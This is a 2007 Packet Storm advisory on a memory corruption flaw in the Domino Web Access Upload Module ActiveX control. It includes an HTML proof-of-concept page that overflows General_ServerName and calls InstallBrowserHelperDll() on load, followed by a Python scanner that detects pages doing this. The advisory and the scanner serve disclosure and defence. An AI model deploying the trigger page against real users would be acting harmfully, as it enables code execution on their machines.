domino-corrupt.txt

2007-12-24T00:00:00
ID PACKETSTORM:62031
Type packetstorm
Reporter Elazar Broad
Modified 2007-12-24T00:00:00

Description

                                        
The Domino Web Access Upload Module version 7.0.34.1 seems to suffer from a memory corruption issue that may allow the execution of arbitrary code. By setting the General_ServerName property and calling the InstallBrowserHelperDll() function it MAY be possible to control the ECX register and thereby control the EIP. PoC as follows:
  
-------------------  
<!--  
written by e.b.  
-->  
<html>  
<head>  
<script language="JavaScript" DEFER>  
function Check() {  
var s = 'A';  
  
while (s.length <= 12000) s = s + 'A';  
  
obj.General_ServerName = s;  
obj.InstallBrowserHelperDll();  
  
}  
</script>  
  
</head>  
<body onload="JavaScript: return Check();">  
<object id="obj" classid="clsid:E008A543-CEFB-4559-912F-C27C2B89F13B" />  
</object>  
</body>  
</html>   
-------------------  
  
  
Elazar  
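
A defender-side check for the pattern in this PoC, as an added example that is not part of the original advisory: it scans HTML (for instance, content captured at a web proxy) for `<object>` tags bound to the CLSID above and for inline script that touches `General_ServerName` or `InstallBrowserHelperDll` on them. The class and function names, the verdict labels and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID, property and method are the ones named in the advisory above.
DWA_CLSID = "clsid:e008a543-cefb-4559-912f-c27c2b89f13b"
RISKY_MEMBERS = ("General_ServerName", "InstallBrowserHelperDll")

class ControlScanner(HTMLParser):
    """Collects ids of <object> tags bound to the CLSID, plus inline script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "object" and (attrs.get("classid") or "").strip().lower() == DWA_CLSID:
            self.object_ids.append(attrs.get("id") or "")  # "" when the tag has no id

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_html(html):
    """Classify one HTML document by what it does with the Upload Module control."""
    scanner = ControlScanner()
    scanner.feed(html)
    scanner.close()
    script = "\n".join(scanner.scripts)
    used = sorted({m for oid in filter(None, scanner.object_ids) for m in RISKY_MEMBERS
                   if re.search(r"\b%s\s*\.\s*%s\b" % (re.escape(oid), m), script)})
    # alert: sets the property and calls the method; review: only loads the control
    verdict = ("alert" if len(used) == len(RISKY_MEMBERS)
               else "review" if scanner.object_ids else "clean")
    return {"verdict": verdict, "object_ids": scanner.object_ids, "members": used}

# Constructed sample page with a short, harmless value.
SAMPLE = ('<script>function f(){ up.General_ServerName = "mail01"; '
          'up.InstallBrowserHelperDll(); }</script><body onload="f()"><object id="up" '
          'classid="CLSID:E008A543-CEFB-4559-912F-C27C2B89F13B"></object></body>')

if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

Matching is static and limited to inline script and tags that carry an `id`, so a `clean` result is inconclusive rather than proof that the control is unused.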
  